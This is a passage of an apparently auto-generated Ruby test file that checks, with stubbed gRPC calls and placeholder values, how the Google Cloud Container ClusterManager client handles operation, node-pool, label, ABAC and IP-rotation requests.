list_operations_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :list_operations, name
assert_kind_of ::Google::Cloud::Container::V1::ListOperationsRequest, request
assert_equal "hello world", request["project_id"]
assert_equal "hello world", request["zone"]
assert_equal "hello world", request["parent"]
refute_nil options
end
Gapic::ServiceStub.stub :new, list_operations_client_stub do
# Create client
client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.list_operations({ project_id: project_id, zone: zone, parent: parent }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.list_operations project_id: project_id, zone: zone, parent: parent do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.list_operations ::Google::Cloud::Container::V1::ListOperationsRequest.new(project_id: project_id, zone: zone, parent: parent) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.list_operations({ project_id: project_id, zone: zone, parent: parent }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.list_operations ::Google::Cloud::Container::V1::ListOperationsRequest.new(project_id: project_id, zone: zone, parent: parent), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, list_operations_client_stub.call_rpc_count
end
end
def test_get_operation
# Create GRPC objects.
grpc_response = ::Google::Cloud::Container::V1::Operation.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
project_id = "hello world"
zone = "hello world"
operation_id = "hello world"
name = "hello world"
get_operation_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :get_operation, name
assert_kind_of ::Google::Cloud::Container::V1::GetOperationRequest, request
assert_equal "hello world", request["project_id"]
assert_equal "hello world", request["zone"]
assert_equal "hello world", request["operation_id"]
assert_equal "hello world", request["name"]
refute_nil options
end
Gapic::ServiceStub.stub :new, get_operation_client_stub do
# Create client
client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.get_operation({ project_id: project_id, zone: zone, operation_id: operation_id, name: name }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.get_operation project_id: project_id, zone: zone, operation_id: operation_id, name: name do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.get_operation ::Google::Cloud::Container::V1::GetOperationRequest.new(project_id: project_id, zone: zone, operation_id: operation_id, name: name) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.get_operation({ project_id: project_id, zone: zone, operation_id: operation_id, name: name }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.get_operation ::Google::Cloud::Container::V1::GetOperationRequest.new(project_id: project_id, zone: zone, operation_id: operation_id, name: name), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, get_operation_client_stub.call_rpc_count
end
end
def test_cancel_operation
# Create GRPC objects.
grpc_response = ::Google::Protobuf::Empty.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
project_id = "hello world"
zone = "hello world"
operation_id = "hello world"
name = "hello world"
cancel_operation_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :cancel_operation, name
assert_kind_of ::Google::Cloud::Container::V1::CancelOperationRequest, request
assert_equal "hello world", request["project_id"]
assert_equal "hello world", request["zone"]
assert_equal "hello world", request["operation_id"]
assert_equal "hello world", request["name"]
refute_nil options
end
Gapic::ServiceStub.stub :new, cancel_operation_client_stub do
# Create client
client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.cancel_operation({ project_id: project_id, zone: zone, operation_id: operation_id, name: name }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.cancel_operation project_id: project_id, zone: zone, operation_id: operation_id, name: name do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.cancel_operation ::Google::Cloud::Container::V1::CancelOperationRequest.new(project_id: project_id, zone: zone, operation_id: operation_id, name: name) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.cancel_operation({ project_id: project_id, zone: zone, operation_id: operation_id, name: name }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.cancel_operation ::Google::Cloud::Container::V1::CancelOperationRequest.new(project_id: project_id, zone: zone, operation_id: operation_id, name: name), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, cancel_operation_client_stub.call_rpc_count
end
end
def test_get_server_config
# Create GRPC objects.
grpc_response = ::Google::Cloud::Container::V1::ServerConfig.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
project_id = "hello world"
zone = "hello world"
name = "hello world"
get_server_config_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :get_server_config, name
assert_kind_of ::Google::Cloud::Container::V1::GetServerConfigRequest, request
assert_equal "hello world", request["project_id"]
assert_equal "hello world", request["zone"]
assert_equal "hello world", request["name"]
refute_nil options
end
Gapic::ServiceStub.stub :new, get_server_config_client_stub do
# Create client
client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.get_server_config({ project_id: project_id, zone: zone, name: name }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.get_server_config project_id: project_id, zone: zone, name: name do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.get_server_config ::Google::Cloud::Container::V1::GetServerConfigRequest.new(project_id: project_id, zone: zone, name: name) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.get_server_config({ project_id: project_id, zone: zone, name: name }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.get_server_config ::Google::Cloud::Container::V1::GetServerConfigRequest.new(project_id: project_id, zone: zone, name: name), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, get_server_config_client_stub.call_rpc_count
end
end
def test_get_json_web_keys
# Create GRPC objects.
grpc_response = ::Google::Cloud::Container::V1::GetJSONWebKeysResponse.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
parent = "hello world"
get_json_web_keys_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :get_json_web_keys, name
assert_kind_of ::Google::Cloud::Container::V1::GetJSONWebKeysRequest, request
assert_equal "hello world", request["parent"]
refute_nil options
end
Gapic::ServiceStub.stub :new, get_json_web_keys_client_stub do
# Create client
client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.get_json_web_keys({ parent: parent }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.get_json_web_keys parent: parent do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.get_json_web_keys ::Google::Cloud::Container::V1::GetJSONWebKeysRequest.new(parent: parent) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.get_json_web_keys({ parent: parent }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.get_json_web_keys ::Google::Cloud::Container::V1::GetJSONWebKeysRequest.new(parent: parent), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, get_json_web_keys_client_stub.call_rpc_count
end
end
def test_list_node_pools
# Create GRPC objects.
grpc_response = ::Google::Cloud::Container::V1::ListNodePoolsResponse.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
project_id = "hello world"
zone = "hello world"
cluster_id = "hello world"
parent = "hello world"
list_node_pools_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :list_node_pools, name
assert_kind_of ::Google::Cloud::Container::V1::ListNodePoolsRequest, request
assert_equal "hello world", request["project_id"]
assert_equal "hello world", request["zone"]
assert_equal "hello world", request["cluster_id"]
assert_equal "hello world", request["parent"]
refute_nil options
end
Gapic::ServiceStub.stub :new, list_node_pools_client_stub do
# Create client
client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.list_node_pools({ project_id: project_id, zone: zone, cluster_id: cluster_id, parent: parent }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.list_node_pools project_id: project_id, zone: zone, cluster_id: cluster_id, parent: parent do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.list_node_pools ::Google::Cloud::Container::V1::ListNodePoolsRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, parent: parent) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.list_node_pools({ project_id: project_id, zone: zone, cluster_id: cluster_id, parent: parent }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.list_node_pools ::Google::Cloud::Container::V1::ListNodePoolsRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, parent: parent), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, list_node_pools_client_stub.call_rpc_count
end
end
def test_get_node_pool
# Create GRPC objects.
grpc_response = ::Google::Cloud::Container::V1::NodePool.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
project_id = "hello world"
zone = "hello world"
cluster_id = "hello world"
node_pool_id = "hello world"
name = "hello world"
get_node_pool_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :get_node_pool, name
assert_kind_of ::Google::Cloud::Container::V1::GetNodePoolRequest, request
assert_equal "hello world", request["project_id"]
assert_equal "hello world", request["zone"]
assert_equal "hello world", request["cluster_id"]
assert_equal "hello world", request["node_pool_id"]
assert_equal "hello world", request["name"]
refute_nil options
end
Gapic::ServiceStub.stub :new, get_node_pool_client_stub do
# Create client
client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.get_node_pool({ project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, name: name }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.get_node_pool project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, name: name do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.get_node_pool ::Google::Cloud::Container::V1::GetNodePoolRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, name: name) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.get_node_pool({ project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, name: name }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.get_node_pool ::Google::Cloud::Container::V1::GetNodePoolRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, name: name), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, get_node_pool_client_stub.call_rpc_count
end
end
def test_create_node_pool
# Create GRPC objects.
grpc_response = ::Google::Cloud::Container::V1::Operation.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
project_id = "hello world"
zone = "hello world"
cluster_id = "hello world"
node_pool = {}
parent = "hello world"
create_node_pool_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :create_node_pool, name
assert_kind_of ::Google::Cloud::Container::V1::CreateNodePoolRequest, request
assert_equal "hello world", request["project_id"]
assert_equal "hello world", request["zone"]
assert_equal "hello world", request["cluster_id"]
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Container::V1::NodePool), request["node_pool"]
assert_equal "hello world", request["parent"]
refute_nil options
end
Gapic::ServiceStub.stub :new, create_node_pool_client_stub do
# Create client
client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.create_node_pool({ project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool: node_pool, parent: parent }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.create_node_pool project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool: node_pool, parent: parent do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.create_node_pool ::Google::Cloud::Container::V1::CreateNodePoolRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool: node_pool, parent: parent) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.create_node_pool({ project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool: node_pool, parent: parent }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.create_node_pool ::Google::Cloud::Container::V1::CreateNodePoolRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool: node_pool, parent: parent), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, create_node_pool_client_stub.call_rpc_count
end
end
def test_delete_node_pool
# Create GRPC objects.
grpc_response = ::Google::Cloud::Container::V1::Operation.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
project_id = "hello world"
zone = "hello world"
cluster_id = "hello world"
node_pool_id = "hello world"
name = "hello world"
delete_node_pool_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :delete_node_pool, name
assert_kind_of ::Google::Cloud::Container::V1::DeleteNodePoolRequest, request
assert_equal "hello world", request["project_id"]
assert_equal "hello world", request["zone"]
assert_equal "hello world", request["cluster_id"]
assert_equal "hello world", request["node_pool_id"]
assert_equal "hello world", request["name"]
refute_nil options
end
Gapic::ServiceStub.stub :new, delete_node_pool_client_stub do
# Create client
client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.delete_node_pool({ project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, name: name }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.delete_node_pool project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, name: name do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.delete_node_pool ::Google::Cloud::Container::V1::DeleteNodePoolRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, name: name) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.delete_node_pool({ project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, name: name }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.delete_node_pool ::Google::Cloud::Container::V1::DeleteNodePoolRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, name: name), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, delete_node_pool_client_stub.call_rpc_count
end
end
def test_rollback_node_pool_upgrade
# Create GRPC objects.
grpc_response = ::Google::Cloud::Container::V1::Operation.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
project_id = "hello world"
zone = "hello world"
cluster_id = "hello world"
node_pool_id = "hello world"
name = "hello world"
rollback_node_pool_upgrade_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :rollback_node_pool_upgrade, name
assert_kind_of ::Google::Cloud::Container::V1::RollbackNodePoolUpgradeRequest, request
assert_equal "hello world", request["project_id"]
assert_equal "hello world", request["zone"]
assert_equal "hello world", request["cluster_id"]
assert_equal "hello world", request["node_pool_id"]
assert_equal "hello world", request["name"]
refute_nil options
end
Gapic::ServiceStub.stub :new, rollback_node_pool_upgrade_client_stub do
# Create client
client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.rollback_node_pool_upgrade({ project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, name: name }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.rollback_node_pool_upgrade project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, name: name do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.rollback_node_pool_upgrade ::Google::Cloud::Container::V1::RollbackNodePoolUpgradeRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, name: name) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.rollback_node_pool_upgrade({ project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, name: name }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.rollback_node_pool_upgrade ::Google::Cloud::Container::V1::RollbackNodePoolUpgradeRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, name: name), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, rollback_node_pool_upgrade_client_stub.call_rpc_count
end
end
def test_set_node_pool_management
# Create GRPC objects.
grpc_response = ::Google::Cloud::Container::V1::Operation.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
project_id = "hello world"
zone = "hello world"
cluster_id = "hello world"
node_pool_id = "hello world"
management = {}
name = "hello world"
set_node_pool_management_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :set_node_pool_management, name
assert_kind_of ::Google::Cloud::Container::V1::SetNodePoolManagementRequest, request
assert_equal "hello world", request["project_id"]
assert_equal "hello world", request["zone"]
assert_equal "hello world", request["cluster_id"]
assert_equal "hello world", request["node_pool_id"]
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Container::V1::NodeManagement), request["management"]
assert_equal "hello world", request["name"]
refute_nil options
end
Gapic::ServiceStub.stub :new, set_node_pool_management_client_stub do
# Create client
client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.set_node_pool_management({ project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, management: management, name: name }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.set_node_pool_management project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, management: management, name: name do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.set_node_pool_management ::Google::Cloud::Container::V1::SetNodePoolManagementRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, management: management, name: name) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.set_node_pool_management({ project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, management: management, name: name }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.set_node_pool_management ::Google::Cloud::Container::V1::SetNodePoolManagementRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, management: management, name: name), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, set_node_pool_management_client_stub.call_rpc_count
end
end
def test_set_labels
# Create GRPC objects.
grpc_response = ::Google::Cloud::Container::V1::Operation.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
project_id = "hello world"
zone = "hello world"
cluster_id = "hello world"
resource_labels = {}
label_fingerprint = "hello world"
name = "hello world"
set_labels_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :set_labels, name
assert_kind_of ::Google::Cloud::Container::V1::SetLabelsRequest, request
assert_equal "hello world", request["project_id"]
assert_equal "hello world", request["zone"]
assert_equal "hello world", request["cluster_id"]
assert_equal({}, request["resource_labels"].to_h)
assert_equal "hello world", request["label_fingerprint"]
assert_equal "hello world", request["name"]
refute_nil options
end
Gapic::ServiceStub.stub :new, set_labels_client_stub do
# Create client
client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.set_labels({ project_id: project_id, zone: zone, cluster_id: cluster_id, resource_labels: resource_labels, label_fingerprint: label_fingerprint, name: name }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.set_labels project_id: project_id, zone: zone, cluster_id: cluster_id, resource_labels: resource_labels, label_fingerprint: label_fingerprint, name: name do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.set_labels ::Google::Cloud::Container::V1::SetLabelsRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, resource_labels: resource_labels, label_fingerprint: label_fingerprint, name: name) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.set_labels({ project_id: project_id, zone: zone, cluster_id: cluster_id, resource_labels: resource_labels, label_fingerprint: label_fingerprint, name: name }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.set_labels ::Google::Cloud::Container::V1::SetLabelsRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, resource_labels: resource_labels, label_fingerprint: label_fingerprint, name: name), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, set_labels_client_stub.call_rpc_count
end
end
def test_set_legacy_abac
# Create GRPC objects.
grpc_response = ::Google::Cloud::Container::V1::Operation.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
project_id = "hello world"
zone = "hello world"
cluster_id = "hello world"
enabled = true
name = "hello world"
set_legacy_abac_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :set_legacy_abac, name
assert_kind_of ::Google::Cloud::Container::V1::SetLegacyAbacRequest, request
assert_equal "hello world", request["project_id"]
assert_equal "hello world", request["zone"]
assert_equal "hello world", request["cluster_id"]
assert_equal true, request["enabled"]
assert_equal "hello world", request["name"]
refute_nil options
end
Gapic::ServiceStub.stub :new, set_legacy_abac_client_stub do
# Create client
client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.set_legacy_abac({ project_id: project_id, zone: zone, cluster_id: cluster_id, enabled: enabled, name: name }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.set_legacy_abac project_id: project_id, zone: zone, cluster_id: cluster_id, enabled: enabled, name: name do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.set_legacy_abac ::Google::Cloud::Container::V1::SetLegacyAbacRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, enabled: enabled, name: name) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.set_legacy_abac({ project_id: project_id, zone: zone, cluster_id: cluster_id, enabled: enabled, name: name }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.set_legacy_abac ::Google::Cloud::Container::V1::SetLegacyAbacRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, enabled: enabled, name: name), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, set_legacy_abac_client_stub.call_rpc_count
end
end
def test_start_ip_rotation
# Create GRPC objects.
grpc_response = ::Google::Cloud::Container::V1::Operation.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
project_id = "hello world"
zone = "hello world"
cluster_id = "hello world"
name = "hello world"
rotate_credentials = true
start_ip_rotation_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :start_ip_rotation, name
assert_kind_of ::Google::Cloud::Container::V1::StartIPRotationRequest, request
assert_equal "hello world", request["project_id"]
assert_equal "hello world", request["zone"]
assert_equal "hello world", request["cluster_id"]
assert_equal "hello world", request["name"]
assert_equal true, request["rotate_credentials"]
refute_nil options
end
Gapic::ServiceStub.stub :new, start_ip_rotation_client_stub do
# Create client
client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.start_ip_rotation({ project_id: project_id, zone: zone, cluster_id: cluster_id, name: name, rotate_credentials: rotate_credentials }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.start_ip_rotation project_id: project_id, zone: zone, cluster_id: cluster_id, name: name, rotate_credentials: rotate_credentials do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.start_ip_rotation ::Google::Cloud::Container::V1::StartIPRotationRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, name: name, rotate_credentials: rotate_credentials) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.start_ip_rotation({ project_id: project_id, zone: zone, cluster_id: cluster_id, name: name, rotate_credentials: rotate_credentials }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.start_ip_rotation ::Google::Cloud::Container::V1::StartIPRotationRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, name: name, rotate_credentials: rotate_credentials), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, start_ip_rotation_client_stub.call_rpc_count
end
end
def test_complete_ip_rotation
# Create GRPC objects.
grpc_response = ::Google::Cloud::Container::V1::Operation.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
project_id = "hello world"
zone = "hello world"
cluster_id = "hello world"
name = "hello world"
complete_ip_rotation_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :complete_ip_rotation, name
assert_kind_of ::Google::Cloud::Container::V1::CompleteIPRotationRequest, request
assert_equal "hello world", request["project_id"]
assert_equal "hello world", request["zone"]
assert_equal "hello world", request["cluster_id"]
assert_equal "hello world", request["name"]
refute_nil options
end
Gapic::ServiceStub.stub :new, complete_ip_rotation_client_stub do
# Create client
client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.complete_ip_rotation({ project_id: project_id, zone: zone, cluster_id: cluster_id, name: name }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.complete_ip_rotation project_id: project_id, zone: zone, cluster_id: cluster_id, name: name do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.complete_ip_rotation ::Google::Cloud::Container::V1::CompleteIPRotationRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, name: name) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
